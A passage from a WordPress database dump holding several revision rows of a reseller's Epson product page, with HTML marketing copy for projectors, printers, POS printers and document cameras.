width=\"263\" height=\"176\" /></p><p>Create stunning visual displays and immersive environments with the LightScene EV-105, the cutting-edge digital signage solution from Epson. A convergence of lighting and display technology, LightScene laser projectors captivate audiences by simultaneously illuminating and projecting on virtually any surface or material, unleashing dynamic, experiential content for digital art, commercial signage and dÃ©cor applications. Designed to blend in discreetly to any setting â€” from retail, hospitality and event spaces to showrooms and museums â€” LightScene EV-105 offers a sleek, black spotlight design, with an array of configuration, mounting and programming options.</p><ul><li>Laser projector for digital art and signage</li><li>Seamlessly blends into virtually any environment</li><li>Up to 20,000 hours of virtually maintenance-free operation</li><li>360-degree mounting: floors, walls or ceilings</li><li>Remote management and control tools</li><li>Best New Award Overall</li></ul><center>[maxbutton id=\"12\" ]</center>		\n			<h2>ULTRA PORTABLE</h2>		\n		<h4 style=\"text-align: center;\"><strong>Epson EB-1785WÂ </strong></h4>\n<img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-1785W.png\" alt=\"\" width=\"238\" height=\"177\" />\nThe Epson EB-1785W packs superior imaging quality along with a suite of connectivity and usability features into a body weighing only 1.83kg and 44mm slim. Wirelessly connect your smart devices to the projector via Wi-Fi, Miracast, iProjection application or NFC technology. The EB-1785W comes with Gesture Presenter technology, which allows you to transit between slides without a clicker. Lastly, with Epson\'s 3LCD technology that delivers up to 3 times wider colour gamut and brightness, you can astound audiences anywhere you go.\n<ul>\n 	<li>White Light Output 3,200 lumens, Colour Light Output 3,200 lumens</li>\n 	<li>WXGA Resolution</li>\n 	<li>Real-Time Auto Keystone Correction</li>\n 	<li>Split Screen Projection</li>\n 	<li>Hassle-Free Presentation with USB 3-in-1 Display Feature and Epson iProjection</li>\n</ul>\n<center>[maxbutton id=\"12\" ]</center>		\n			<h2>INTERACTIVE</h2>		\n		<h4 style=\"text-align: center;\"><strong>Epson EB-536WiÂ </strong></h4><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-536Wi.png\" alt=\"\" width=\"242\" height=\"136\" /></p><p>Project large screen sizes even at close range and make your presentations larger-than-life with Epson EB-536Wi projector.</p><ul><li>White and Colour Brightness at 3,400lm</li><li>WXGA Resolution</li><li>Multi-PC projection</li><li>HDMI Connectivity</li><li>Pen Interactivity</li></ul><center>[maxbutton id=\"12\" ]</center><h4 style=\"text-align: center;\"><strong>Epson 595Wi/585Wi/575Wi</strong>Â <img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-595Wi.png\" alt=\"\" width=\"276\" height=\"155\" /></h4>\nWith the finger-touch interactive function and PC-free annotation, you can easily transform any surface into an interactive environment so everyone can throw their ideas on the table.\n<ul>\n 	<li>WXGA Resolution</li>\n 	<li>White and Colour Brightness at 3,300lm</li>\n 	<li>Multi-PC projection</li>\n 	<li>HDMI Connectivity x2</li>\n</ul>\n<center>[maxbutton id=\"12\" ]</center>		\n			<h3>HIGH BRIGHTNESS</h3>		\n		<p><strong>Epson EB-L1405UNLÂ </strong></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/EB-L1405UNL.png\" alt=\"\" width=\"207\" height=\"117\" /></p><p>The Epson EB-L1405U projector is designed to deliver unyielding laser performance, from any position to most surfaces, up to 20,000Â long lasting hours maintenance-free.</p><ul><li>White and Colour Brightness at 8,000lm</li><li>WUXGA (1920 x 1200)</li><li>Edge-blending to create large panoramic images</li><li>Curve and corner wall projection</li><li>HDBaseT</li></ul>[maxbutton id=\"12\" ]<p><strong>Epson EB-G7400UNLÂ </strong></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-G7400UNL.png\" alt=\"\" width=\"205\" height=\"116\" /></p><p>Epson high brightness EB-G7400U projector presents a new perspective on clarity, durability, and versatility. With the advanced C2Fineâ„¢ and 4K Enhancement Technology, projections are brought to life with vibrant colours in extreme resolution and vividness. Overcome the limitations of space constraints and project large and uncompromised images through the projectorâ€™s astoundingly short throw ratio of 0.35*.</p><p><em>* With optional ELPLX01 zero offset ultra-short throw lens.</em></p><ul><li>High Brightness</li><li>Beyond Full HD Resolution</li><li>Powered Lens</li><li>Portrait Projection</li><li>Flexible Installation</li><li>Edge Blending</li><li>Point Correction</li></ul>[maxbutton id=\"12\" ]<p><strong>Epson EB-Z10000UÂ </strong></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-Z10000U.png\" alt=\"\" width=\"208\" height=\"117\" /></p><p>Discover a powerful way to impress your audience the EB-Z10000U high brightness business projector gives you stunning, high-definition images with its 3LCD technology.</p><ul><li>White and Colour Brightness at 10,000Â lm</li><li>WUXGA resolution</li><li>High Reliability and Durability</li><li>Suitable for 24/7 usage</li><li>Flexible projection angles and installations</li></ul>[maxbutton id=\"12\" ]<h3>DOCUMENT CAMERAS</h3><p><strong>Document Camera ELPDC21Â </strong><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Document-Camera-ELPDC21.jpg\" alt=\"\" width=\"206\" height=\"137\" /></p><p>Cut through the hassle, and get straight to your presentation. Epsons series of document cameras not only captures details with Full HD resolution, its versatile connectivity also gives you great functionality.</p><ul><li>Pixels: 2MP (1920 x 1080 pixels)</li><li>Camera Sensor: 1/2.7 inch CMOS Sensor</li><li>Resolution: Up to Full HD (1080p)</li><li>Zoom: 10x Digital Zoom, 12x Optical Zoom</li><li>Weight: Approx 3.0kg</li></ul><p>[maxbutton id=\"12\" ]</p>','Epson','','inherit','closed','closed','','1486-revision-v1','','','2019-09-26 10:53:54','2019-09-26 02:53:54','',1486,'https://bintara.com.my/blog/2019/09/26/1486-revision-v1/',0,'revision','',0),(3497,1,'2019-09-26 10:54:29','2019-09-26 02:54:29','<p>As a global technology leader, Epson creates and delivers technology solutions for businesses and consumers, from inkjet printers and digital printing systems to 3LCD projectors, smart glasses, sensing systems and industrial robots. The company is focused on driving innovations and exceeding customer expectations in inkjet, visual communications, wearables and robotics.</p><h2>Printers for Work</h2><p>Epson has the best printers for your business requirements regardless documents, photos, receipts, large-formats, labels, or even apparels.</p>		\n			<h2>BUSINESS INKJET PRINTER</h2>		\n		<h4 style=\"text-align: center;\"><strong>Epson WorkForce Enterprise WF-C17590Â </strong></h4><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-WorkForce-Enterprise-WF-C17590.jpg\" alt=\"\" width=\"366\" height=\"207\" /></p><p>Our massive investment in revolutionary technologies enables us to pay attention to every minute detail. PrecisionCoreâ„¢, our next generation, high-density printhead, takes a great leap forward in enterprise printing. Epson WorkForce Enterprise WF-C17590 has arrived, giving you exactly what you need: superior quality, excellent connectivity and prints at lightning fast speed.</p><ul><li>4-in-1 Network MFP: Print | Copy | Scan | Fax</li><li>Ink: DURABrite<sup>TM</sup>Â Pro pigment ink cartridges</li><li>ISO Print Speed: 75 ISO ppm (black/colour) simplex/duplex</li></ul>		\n		<h4 style=\"text-align: center;\">[maxbutton id=\"12\" ]</h4><h4 style=\"text-align: center;\"><strong>Epson WorkForce Pro WF-C5290Â </strong></h4><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-WorkForce-Pro-WF-C5290.png\" alt=\"\" width=\"378\" height=\"213\" /></p><p>Enjoy low-cost, reliable printing with Epson WorkForce Pro WF-C5290 business printer. Delivering fast print speeds of up to 24ipm with a first page-out time of just 4.8 seconds, it is built to handle the most demanding print jobs. With a range of printing and connectivity features, this printer is the ideal solution for small workgroups that require hassle-free, low-maintenance and productive-boosting printing.</p><ul><li>High yield ink packs</li><li>High-speed auto-duplex printing</li><li>USB, Ethernet, Wi-Fi, Wi-Fi Direct and NFC</li><li>Epson Connect</li><li>EnergyÂ saving</li></ul><h4 style=\"text-align: center;\">[maxbutton id=\"12\" ]</h4><h4 style=\"text-align: center;\"><strong>Epson WorkForce WF-100Â </strong></h4><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-WorkForce-WF-100.png\" alt=\"\" width=\"378\" height=\"213\" /></p><p>Introducing the Epson WorkForce WF-100, a lightweight portable inkjet printer designed for professionals on the go. Battery-operated with integrated wireless capabilities such as Wi-Fi Direct and Epson Connect, you can have quality colour printouts anytime, anywhere.</p><ul><li>Print speed up to 14 ppm</li><li>Epson Connect</li><li>1.44 Colour LCD Panel</li><li>Wi-Fi and Wi-Fi Direct connectivity</li><li>Built-in battery</li></ul>		\n		<h4 style=\"text-align: center;\">[maxbutton id=\"12\" ]</h4><h4 style=\"text-align: center;\"><strong>Epson WorkForce WF-7711</strong></h4>\n<img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-WorkForce-WF-7711.png\" alt=\"\" width=\"304\" height=\"172\" /><br>\nChange the way you print A3+ business documents with the Epson WorkForce WF-7711 printer. Designed for convenience, this smart printer is equipped with a suite of connectivity features, from USB and Ethernet to Wi-Fi Direct and NFC. With PrecisionCore<sup>TM</sup>Â technology, fast printing speed consistently delivers success in every detail.\n<ul>\n 	<li>Print speeds up to 18ipm for black and 10ipm for colour</li>\n 	<li>USB, Ethernet, Wi-Fi, Wi-Fi Direct and NFC</li>\n 	<li>Duplex printing up to A3 size</li>\n 	<li>Epson DURABrite<sup>TM</sup>Â Ultra ink</li>\n 	<li>4.3â€ Colour LCD Touch Panel</li>\n 	<li>Print, Scan, Copy Fax with ADF</li>\n</ul>\n<center>[maxbutton id=\"12\" ]</center>		\n			<h2>INK TANK SYSTEM</h2>		\n		<h4 style=\"text-align: center;\"><strong>Epson EcoTank L3150</strong></h4><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EcoTank-L3150-.jpg\" alt=\"\" width=\"311\" height=\"175\" /></p><p>Save more with Epsonâ€™s economical and multifunctional printing solutions for businessâ€”the EcoTank L3150â€”built to bring down costs, and bring up productivity. The integrated ink tank enables spill-free, error-free refilling with individual bottles that have designated nozzles. Other features include borderless 4R printing and an ultra-high yield of 7,500 coloured and 4,500 black-and-white pages. The EcoTank L3150 also delivers the convenience of wireless connectivity, allowing direct printing from smart devices.</p><ul><li>Compact integrated tank design</li><li>High yield ink bottles</li><li>Spill-free, error-free refilling</li><li>Wi-Fi, Wi-Fi Direct</li><li>Epson Connect (Epson iPrint, Epson Email Print and Remote Print Driver)</li><li>Borderless printing up to 4R</li></ul><center>[maxbutton id=\"12\" ]</center><h4 style=\"text-align: center;\"><strong>Epson L120 PrinterÂ </strong><br /><br /><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-L120-Printer.png\" alt=\"\" width=\"301\" height=\"170\" /></h4><p>The Epson L120 ink tank system printer brings speedy performance with low running costs to all your personal and work projects.</p><ul><li>High-yield ink bottles</li><li>Print speed up to 8.5ipm for black-and-white and 4.5ipm for color</li><li>Compact Size</li><li>Warranty of 2 Years or 20,000 Pages, whichever comes first</li></ul>		\n		[maxbutton id=\"12\" ]<h4 style=\"text-align: center;\"><strong>Epson M1100 Printer</strong></h4><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-M1100-Printer-.png\" alt=\"\" width=\"315\" height=\"178\" /></p><p>EfficiencyÂ meets economy with the EcoTank monochrome M1100 printer. Look forward to lower business costs with bottles that provide an ultra-high page yield of up to 6,000 pagesÂ each. Simplify processes with the integrated ink tank that enables spill - and error-free ink refilling, and enjoy laser-quality text that is smudge-proof and water-resistant with the pigment ink.</p><ul><li>Compact integrated tank design</li><li>High-yield pigment ink bottle</li><li>Spill-free, error-free refilling</li><li>Print speed up to 32ppm (15ipm)</li><li>4 years warranty</li></ul>		\n		<center>[maxbutton id=\"12\" ]</center>		\n			<h2>LASER PRINTER</h2>		\n		<h4 style=\"text-align: center;\"><strong>Epson AcuLaser C9300N</strong></h4><br><br>\n<img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-AcuLaser-C9300N.png\" alt=\"\" width=\"313\" height=\"177\" /><br>\nThe Epson AcuLaserâ„¢ C9300N breaks new ground with its class-leading 1200dpi standard resolution for A3 colour laser printing. Together with its fast speed and high reliability, it packs superior performance in a cost efficient design that perfectly complements the needs of demanding workgroups.\n<ul>\n 	<li>1200 x 1200 dpi</li>\n 	<li>Speed: Up to 30ppm</li>\n 	<li>First page out in 8.3 sec or less (mono A4), 9.9 sec (colour A4)</li>\n 	<li>Quality prints with new Epson Technologies</li>\n 	<li>New print job management features</li>\n</ul>[maxbutton id=\"12\" ]<h4 style=\"text-align: center;\">Â <strong>Epson WorkForce AL-M320DNÂ </strong></h4><br><br>\n<img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-WorkForce-AL-M320DN-.jpg\" alt=\"\" width=\"254\" height=\"296\" /><br>\nThe Workforce AL-M320DN delivers absolute performance and reliability despite their compact size. Equipped with network printing capabilities and blazing fast performance to support ultra-high volume printing, these printers are built for the most demanding office environments. Further boost productivity with the free fleet management software, Epson Device Admin, to organise and monitor printers remotely.\n<ul>\n 	<li>1200 x 1200 dpi</li>\n 	<li>Print speed up to 35ppm</li>\n 	<li>Auto-Duplex</li>\n 	<li>Ethernet &amp; Epson iPrint</li>\n 	<li>2 optional paper cassette tray</li>\n</ul>[maxbutton id=\"12\" ]<h4><strong>Epson WorkForce AL-M8100DNÂ </strong></h4><br><br>\n<img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-WorkForce-AL-M8100DN-.png\" alt=\"\" width=\"256\" height=\"144\" /><br><br>\nUnleash remarkable efficiency to your workflow. Powered by a 600Mhz dual core processor, the WorkForce AL-8100DN delivers quality A3 and A4 prints with swift speeds of up to 40ppm and is packed with 1GB RAM for faster processing of multiple print jobs.\n<ul>\n 	<li>1200 x 1200 dpi</li>\n 	<li>Print speed up to 40 ppm</li>\n 	<li>Epson iPrint</li>\n 	<li>Ethernet</li>\n 	<li>4 optional cassette trays</li>\n</ul>[maxbutton id=\"12\" ]		\n			<h2>POS PRINTER</h2>		\n		<h4 style=\"text-align: center;\"><strong>Epson TM-H6000IVÂ </strong></h4><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-TM-H6000IV.png\" alt=\"\" width=\"224\" height=\"125\" /></p><p>The Epson multifunction POS printer TM-H6000IV, features everything retailers need from fast receipt printing and check processing to best-in-class reliability.</p><ul><li>Thermal &amp; Dot Output</li><li>Speed: Up to 300mm/sec</li><li>Check printing</li><li>Bi-directional printing</li><li>SupportsÂ slip printing, validation and endorsement print</li></ul><center>[maxbutton id=\"12\" ]</center><h4 style=\"text-align: center;\"><strong>Epson TM-T88V-iÂ </strong>\n<img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-TM-T88V-i.png\" alt=\"\" width=\"243\" height=\"137\" /></h4>\nCreate a world of possibilities with TM-T88V-i Intelligent Solution. Equipped with cloud and web-capabilities, you\'ll have access to a variety of intelligent functions delivered by a compact, space-saving printer that fits easily into your business.\n<ul>\n 	<li>Printing speed of up to 300mm/second</li>\n 	<li>20 million lines for printer mechanism</li>\n 	<li>Up to 2 million for auto-cutter</li>\n 	<li>LAN, Serial, USB 2.0 (Type A) x 4</li>\n 	<li>Control peripherals easily</li>\n</ul>\n<center>[maxbutton id=\"12\" ]</center><h4 style=\"text-align: center;\"><strong>Epson TM-T70IIÂ </strong><br /><br /><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-TM-T70II.png\" alt=\"\" width=\"254\" height=\"143\" /><br /><br /></h4><p>The Epson\'s TM-T70II is the smallest in class receipt printer with a full frontal operation.</p><ul><li>Print method: Thermal line printing</li><li>Width: 79Â Â±Â 0.5 mm</li><li>Print Speed: Up to 250 mm/ sec</li><li>Auto-cutter feature</li></ul><center>[maxbutton id=\"12\" ]</center>		\n			<h2>PHOTO PRINTER</h2>		\n		<h4 style=\"text-align: center;\"><strong>Epson L1800 A3 Photo Ink Tank Printer</strong></h4><p><br /><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-L1800-Printer.png\" alt=\"\" width=\"241\" height=\"175\" /></p><p>In creating the next wave of printing innovation, Epson introduces the worlds first truly affordable 6-colour A3+ original ink tank system printer.</p><ul><li>Yield of up to 1,500 4R photos</li><li>Print speed up to 15ppm</li><li>High-yield ink bottles</li><li>1-year warranty or 9,000 prints</li></ul>		\n		[maxbutton id=\"12\" ]<h4 style=\"text-align: center;\"><strong>Epson L850 PrinterÂ </strong></h4><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-L850-Printer.png\" alt=\"\" width=\"261\" height=\"147\" /></p><p>Imaging enthusiasts and professionals can look forward to the 6-colour ink tank system, presenting vibrant borderless prints and unrivalled performance at a remarkably low cost through this 3-in-1 photo printer.</p><ul><li>High-yield ink bottles</li><li>2.7 colour LCD screen</li><li>Direct printing via memory card slot, USB port and PictBridge</li><li>CD/DVD printing</li><li>Warranty of 1 year or 3,000 photo prints, whichever comes first</li></ul><center>[maxbutton id=\"12\" ]</center><h4 style=\"text-align: center;\"><strong>Epson L805 PrinterÂ </strong><br /><br /><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-L805-Printer-.png\" alt=\"\" width=\"240\" height=\"135\" /></h4><p><br />The L805s integrated Wi-Fi support and expanded colour gamut of 6 inks brings you ease of printing from your mobile devices over a wireless network so you can print low-cost, lab-quality photos at your convenience.</p><ul><li>Yield of Up to 1,800 4R photos</li><li>Lowest Printing Costs</li><li>Wi-Fi &amp; Epson iPrint</li><li>CD/DVD Printing Capability</li><li>1 year or 3,000 prints warranty</li></ul>[maxbutton id=\"12\" ]		\n			<h2>Projectors for Work</h2>		\n			<h2>CORPORATE AND EDUCATIONÂ </h2>		\n		<h4 style=\"text-align: center;\"><strong>Epson EB-2055</strong></h4><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-2055.png\" alt=\"\" width=\"245\" height=\"163\" /></p><p>Leave the lights on and take control whether in the meeting room or classroom. Epsonâ€™s EB-2055 projector is engineered to shine outstandingly even in well-lit environments to enrich your presentation experience. Your brilliant presentations are made even better and more convenient with the new gesture-control function that allows you to navigate between your slides without the use of a peripheral device.</p><ul><li>XGA Resolution</li><li>White and Colour Light Output at 5,000 lumens</li><li>Gesture Presenter</li><li>Multi-PC Projection</li><li>2 x HDMI</li><li>Split Screen</li></ul><center>[maxbutton id=\"12\" ]</center><h4 style=\"text-align: center;\"><strong>Epson EB-2142W</strong>\n<img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-2142W.jpg\" alt=\"\" width=\"245\" height=\"138\" /></h4>\nEnjoy success and unparalleled performance with Epson business projectors. Fully maximise your office space and experience a variety of connectivity options for your ultimate convenience. Along with long lamp-life and maintenance cycles, potential for saving costs and improving energy efficiency is now made possible for you. Every component is skillfully innovated with attention to detail in mind, including the integrated 3LCD technology that will provide you with stunning colour brightness for quality images.\n<ul>\n 	<li>White and Colour Brightness at 4,200lm</li>\n 	<li>WXGA Resolution</li>\n 	<li>12000 hours lamp life in eco-mode</li>\n 	<li>MHL-enabled</li>\n 	<li>Multi-PC Projection</li>\n 	<li>Horizontal Keystone Slider</li>\n 	<li>Miracast<sup>Â®</sup></li>\n</ul>\n<center>[maxbutton id=\"12\" ]</center>\n<h4 style=\"text-align: center;\"><strong>Epson EB-L500WÂ </strong></h4>\n<img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-L500W.jpg\" alt=\"\" width=\"251\" height=\"142\" />\nThe compact, affordable EB-L500W laser projector delivers powerful performance for education and business applications. Get bright, vivid images with 5,000 lumens colour/white brightness. This wireless projector also offers WXGA resolution and Full HD support. Featuring breakthrough laser technology, it delivers a laser light source of up to 20,000 hours. And, it offers virtually maintenance-free operation for the life of the optical engine. Plus, it features a Dynamic contrast ratio of up to 2,500,000:1. It also includes wireless networking with enterprise-level security, and advanced installation features.\n<ul>\n 	<li>5,000 lumens colour/white brightness<sup>Â </sup></li>\n 	<li>Colourful WXGA; up to 2,500,000:1 Dynamic contrast ratio</li>\n 	<li>Laser light source of up to 20,000 hours</li>\n 	<li>Virtually maintenance-free for optical engine life</li>\n</ul>\n<center>[maxbutton id=\"12\" ]</center>		\n			<h2>ACCENT LIGHTING LASER PROJECTORS</h2>		\n		<h4 style=\"text-align: center;\"><strong>Epson LightScene EV-105</strong><br /><br /></h4><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-LightScene-EV-105.jpg\" alt=\"\" width=\"263\" height=\"176\" /></p><p>Create stunning visual displays and immersive environments with the LightScene EV-105, the cutting-edge digital signage solution from Epson. A convergence of lighting and display technology, LightScene laser projectors captivate audiences by simultaneously illuminating and projecting on virtually any surface or material, unleashing dynamic, experiential content for digital art, commercial signage and dÃ©cor applications. Designed to blend in discreetly to any setting â€” from retail, hospitality and event spaces to showrooms and museums â€” LightScene EV-105 offers a sleek, black spotlight design, with an array of configuration, mounting and programming options.</p><ul><li>Laser projector for digital art and signage</li><li>Seamlessly blends into virtually any environment</li><li>Up to 20,000 hours of virtually maintenance-free operation</li><li>360-degree mounting: floors, walls or ceilings</li><li>Remote management and control tools</li><li>Best New Award Overall</li></ul><center>[maxbutton id=\"12\" ]</center>		\n			<h2>ULTRA PORTABLE</h2>		\n		<h4 style=\"text-align: center;\"><strong>Epson EB-1785WÂ </strong></h4>\n<img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-1785W.png\" alt=\"\" width=\"238\" height=\"177\" />\nThe Epson EB-1785W packs superior imaging quality along with a suite of connectivity and usability features into a body weighing only 1.83kg and 44mm slim. Wirelessly connect your smart devices to the projector via Wi-Fi, Miracast, iProjection application or NFC technology. The EB-1785W comes with Gesture Presenter technology, which allows you to transit between slides without a clicker. Lastly, with Epson\'s 3LCD technology that delivers up to 3 times wider colour gamut and brightness, you can astound audiences anywhere you go.\n<ul>\n 	<li>White Light Output 3,200 lumens, Colour Light Output 3,200 lumens</li>\n 	<li>WXGA Resolution</li>\n 	<li>Real-Time Auto Keystone Correction</li>\n 	<li>Split Screen Projection</li>\n 	<li>Hassle-Free Presentation with USB 3-in-1 Display Feature and Epson iProjection</li>\n</ul>\n<center>[maxbutton id=\"12\" ]</center>		\n			<h2>INTERACTIVE</h2>		\n		<h4 style=\"text-align: center;\"><strong>Epson EB-536WiÂ </strong></h4><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-536Wi.png\" alt=\"\" width=\"242\" height=\"136\" /></p><p>Project large screen sizes even at close range and make your presentations larger-than-life with Epson EB-536Wi projector.</p><ul><li>White and Colour Brightness at 3,400lm</li><li>WXGA Resolution</li><li>Multi-PC projection</li><li>HDMI Connectivity</li><li>Pen Interactivity</li></ul><center>[maxbutton id=\"12\" ]</center><h4 style=\"text-align: center;\"><strong>Epson 595Wi/585Wi/575Wi</strong>Â <img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-595Wi.png\" alt=\"\" width=\"276\" height=\"155\" /></h4>\nWith the finger-touch interactive function and PC-free annotation, you can easily transform any surface into an interactive environment so everyone can throw their ideas on the table.\n<ul>\n 	<li>WXGA Resolution</li>\n 	<li>White and Colour Brightness at 3,300lm</li>\n 	<li>Multi-PC projection</li>\n 	<li>HDMI Connectivity x2</li>\n</ul>\n<center>[maxbutton id=\"12\" ]</center>		\n			<h3>HIGH BRIGHTNESS</h3>		\n		<p><strong>Epson EB-L1405UNLÂ </strong></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/EB-L1405UNL.png\" alt=\"\" width=\"207\" height=\"117\" /></p><p>The Epson EB-L1405U projector is designed to deliver unyielding laser performance, from any position to most surfaces, up to 20,000Â long lasting hours maintenance-free.</p><ul><li>White and Colour Brightness at 8,000lm</li><li>WUXGA (1920 x 1200)</li><li>Edge-blending to create large panoramic images</li><li>Curve and corner wall projection</li><li>HDBaseT</li></ul>[maxbutton id=\"12\" ]<p><strong>Epson EB-G7400UNLÂ </strong></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-G7400UNL.png\" alt=\"\" width=\"205\" height=\"116\" /></p><p>Epson high brightness EB-G7400U projector presents a new perspective on clarity, durability, and versatility. With the advanced C2Fineâ„¢ and 4K Enhancement Technology, projections are brought to life with vibrant colours in extreme resolution and vividness. Overcome the limitations of space constraints and project large and uncompromised images through the projectorâ€™s astoundingly short throw ratio of 0.35*.</p><p><em>* With optional ELPLX01 zero offset ultra-short throw lens.</em></p><ul><li>High Brightness</li><li>Beyond Full HD Resolution</li><li>Powered Lens</li><li>Portrait Projection</li><li>Flexible Installation</li><li>Edge Blending</li><li>Point Correction</li></ul>[maxbutton id=\"12\" ]<p><strong>Epson EB-Z10000UÂ </strong></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-Z10000U.png\" alt=\"\" width=\"208\" height=\"117\" /></p><p>Discover a powerful way to impress your audience the EB-Z10000U high brightness business projector gives you stunning, high-definition images with its 3LCD technology.</p><ul><li>White and Colour Brightness at 10,000Â lm</li><li>WUXGA resolution</li><li>High Reliability and Durability</li><li>Suitable for 24/7 usage</li><li>Flexible projection angles and installations</li></ul>[maxbutton id=\"12\" ]<h3>DOCUMENT CAMERAS</h3><p><strong>Document Camera ELPDC21Â </strong><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Document-Camera-ELPDC21.jpg\" alt=\"\" width=\"206\" height=\"137\" /></p><p>Cut through the hassle, and get straight to your presentation. Epsons series of document cameras not only captures details with Full HD resolution, its versatile connectivity also gives you great functionality.</p><ul><li>Pixels: 2MP (1920 x 1080 pixels)</li><li>Camera Sensor: 1/2.7 inch CMOS Sensor</li><li>Resolution: Up to Full HD (1080p)</li><li>Zoom: 10x Digital Zoom, 12x Optical Zoom</li><li>Weight: Approx 3.0kg</li></ul><p>[maxbutton id=\"12\" ]</p>','Epson','','inherit','closed','closed','','1486-revision-v1','','','2019-09-26 10:54:29','2019-09-26 02:54:29','',1486,'https://bintara.com.my/blog/2019/09/26/1486-revision-v1/',0,'revision','',0),(3498,1,'2019-09-26 10:58:29','2019-09-26 02:58:29','<p>As a global technology leader, Epson creates and delivers technology solutions for businesses and consumers, from inkjet printers and digital printing systems to 3LCD projectors, smart glasses, sensing systems and industrial robots. The company is focused on driving innovations and exceeding customer expectations in inkjet, visual communications, wearables and robotics.</p><h2>Printers for Work</h2><p>Epson has the best printers for your business requirements regardless documents, photos, receipts, large-formats, labels, or even apparels.</p>		\n			<h2>BUSINESS INKJET PRINTER</h2>		\n		<h4 style=\"text-align: center;\"><strong>Epson WorkForce Enterprise WF-C17590Â </strong></h4><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-WorkForce-Enterprise-WF-C17590.jpg\" alt=\"\" width=\"366\" height=\"207\" /></p><p>Our massive investment in revolutionary technologies enables us to pay attention to every minute detail. PrecisionCoreâ„¢, our next generation, high-density printhead, takes a great leap forward in enterprise printing. Epson WorkForce Enterprise WF-C17590 has arrived, giving you exactly what you need: superior quality, excellent connectivity and prints at lightning fast speed.</p><ul><li>4-in-1 Network MFP: Print | Copy | Scan | Fax</li><li>Ink: DURABrite<sup>TM</sup>Â Pro pigment ink cartridges</li><li>ISO Print Speed: 75 ISO ppm (black/colour) simplex/duplex</li></ul>		\n		<h4 style=\"text-align: center;\">[maxbutton id=\"12\" ]</h4><h4 style=\"text-align: center;\"><strong>Epson WorkForce Pro WF-C5290Â </strong></h4><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-WorkForce-Pro-WF-C5290.png\" alt=\"\" width=\"378\" height=\"213\" /></p><p>Enjoy low-cost, reliable printing with Epson WorkForce Pro WF-C5290 business printer. Delivering fast print speeds of up to 24ipm with a first page-out time of just 4.8 seconds, it is built to handle the most demanding print jobs. With a range of printing and connectivity features, this printer is the ideal solution for small workgroups that require hassle-free, low-maintenance and productive-boosting printing.</p><ul><li>High yield ink packs</li><li>High-speed auto-duplex printing</li><li>USB, Ethernet, Wi-Fi, Wi-Fi Direct and NFC</li><li>Epson Connect</li><li>EnergyÂ saving</li></ul><h4 style=\"text-align: center;\">[maxbutton id=\"12\" ]</h4><h4 style=\"text-align: center;\"><strong>Epson WorkForce WF-100Â </strong></h4><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-WorkForce-WF-100.png\" alt=\"\" width=\"378\" height=\"213\" /></p><p>Introducing the Epson WorkForce WF-100, a lightweight portable inkjet printer designed for professionals on the go. Battery-operated with integrated wireless capabilities such as Wi-Fi Direct and Epson Connect, you can have quality colour printouts anytime, anywhere.</p><ul><li>Print speed up to 14 ppm</li><li>Epson Connect</li><li>1.44 Colour LCD Panel</li><li>Wi-Fi and Wi-Fi Direct connectivity</li><li>Built-in battery</li></ul>		\n		<h4 style=\"text-align: center;\">[maxbutton id=\"12\" ]</h4><h4 style=\"text-align: center;\"><strong>Epson WorkForce WF-7711</strong></h4>\n<img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-WorkForce-WF-7711.png\" alt=\"\" width=\"304\" height=\"172\" /><br>\nChange the way you print A3+ business documents with the Epson WorkForce WF-7711 printer. Designed for convenience, this smart printer is equipped with a suite of connectivity features, from USB and Ethernet to Wi-Fi Direct and NFC. With PrecisionCore<sup>TM</sup>Â technology, fast printing speed consistently delivers success in every detail.\n<ul>\n 	<li>Print speeds up to 18ipm for black and 10ipm for colour</li>\n 	<li>USB, Ethernet, Wi-Fi, Wi-Fi Direct and NFC</li>\n 	<li>Duplex printing up to A3 size</li>\n 	<li>Epson DURABrite<sup>TM</sup>Â Ultra ink</li>\n 	<li>4.3â€ Colour LCD Touch Panel</li>\n 	<li>Print, Scan, Copy Fax with ADF</li>\n</ul>\n<center>[maxbutton id=\"12\" ]</center>		\n			<h2>INK TANK SYSTEM</h2>		\n		<h4 style=\"text-align: center;\"><strong>Epson EcoTank L3150</strong></h4><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EcoTank-L3150-.jpg\" alt=\"\" 